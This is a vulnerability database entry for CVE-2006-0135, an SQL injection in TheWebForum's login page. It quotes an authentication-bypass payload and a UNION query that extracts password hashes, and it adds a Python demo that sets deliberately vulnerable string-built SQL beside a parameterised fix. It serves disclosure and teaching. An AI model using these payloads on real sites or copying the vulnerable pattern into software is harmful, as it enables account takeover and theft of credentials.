TheWebForum Multiple Input Validation Vulnerabilities

Vulnerability ID 1109596 Vulnerability Type SQL Injection
Published 2006-01-06 Updated 2006-01-15
CVE ID CVE-2006-0135 CNNVD ID CNNVD-200601-058
Platform PHP CVSS Score 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/27037
https://cxsecurity.com/issue/WLB-2006010013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-058
|Vulnerability Details
A SQL injection vulnerability exists in login.php in TheWebForum (twf) 1.2.1. Remote attackers can execute arbitrary SQL commands and bypass login authentication via the username parameter (also known as the u variable).
|Vulnerability EXP
source: http://www.securityfocus.com/bid/16161/info

TheWebForum is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials and allow an attacker to control how the site is rendered to the user. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation as well as other attacks. 

Authentication bypass example (SQL Injection):
http://www.example.com/twf/login.php
User Name: a' or 'a'='a'/*
Password: anypassword

Get user's password hash example (SQL Injection):
http://www.example.com/twf/login.php
User Name: a' union select N,password, 3 from users/*
The displayed user name will contain the password hash of the user with ID=N.
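To make the root cause and the fix concrete, the following is an added Python example, not code from TheWebForum or from the advisory. It places a hypothetical reconstruction of the flawed string-concatenation pattern beside a parameterised query and runs both against a constructed in-memory SQLite table using the authentication-bypass user name quoted above. The table name, column names and the stored placeholder hash are assumptions, not taken from the project.

```python
import sqlite3

# Constructed sample data: one forum account with a placeholder for the
# stored password hash (no real hash algorithm is modelled here).
SAMPLE_USERS = [(1, "admin", "PLACEHOLDER_HASH_admin")]

# The "User Name" payload quoted in the advisory above.
BYPASS_USERNAME = "a' or 'a'='a'/*"


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the forum's user table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Hypothetical reconstruction of the vulnerable pattern.

    The submitted values are spliced directly into the SQL text, so a quote
    in the user name closes the string literal, "or 'a'='a'" makes the WHERE
    clause always true, and "/*" comments out the password check entirely.
    """
    sql = (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Hardened version: a parameterised query.

    The driver binds each value as one opaque string, so the same payload is
    compared as a literal user name and matches no row.
    """
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, BYPASS_USERNAME, "anypassword"))
    print("safe:      ", login_safe(db, BYPASS_USERNAME, "anypassword"))
```

The vulnerable function returns the first account without knowing its password; the parameterised one returns nothing for the same input and still authenticates a genuine credential pair. In PHP the equivalent fix is to use prepared statements (PDO or mysqli) rather than interpolating request values into the query string.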
|References

Source: BID
Name: 16161
Link: http://www.securityfocus.com/bid/16161
Source: BUGTRAQ
Name: 20060106 [eVuln] TheWebForum Script Insertion and Authentication Bypass
Link: http://www.securityfocus.com/archive/1/archive/1/421039/100/0/threaded
Source: VUPEN
Name: ADV-2006-0093
Link: http://www.frsirt.com/english/advisories/2006/0093
Source: SECTRACK
Name: 1015450
Link: http://securitytracker.com/id?1015450
Source: SECUNIA
Name: 18392
Link: http://secunia.com/advisories/18392
Source: MISC
Link: http://evuln.com/vulns/17/summary.html
Source: MISC
Link: http://evuln.com/vulns/17/exploit.html
Source: XF
Name: thewebforum-login-sql-injection(24027)
Link: http://xforce.iss.net/xforce/xfdb/24027
Source: OSVDB
Name: 22294
Link: http://www.osvdb.org/22294
Source: SREASON
Name: 321
Link: http://securityreason.com/securityalert/321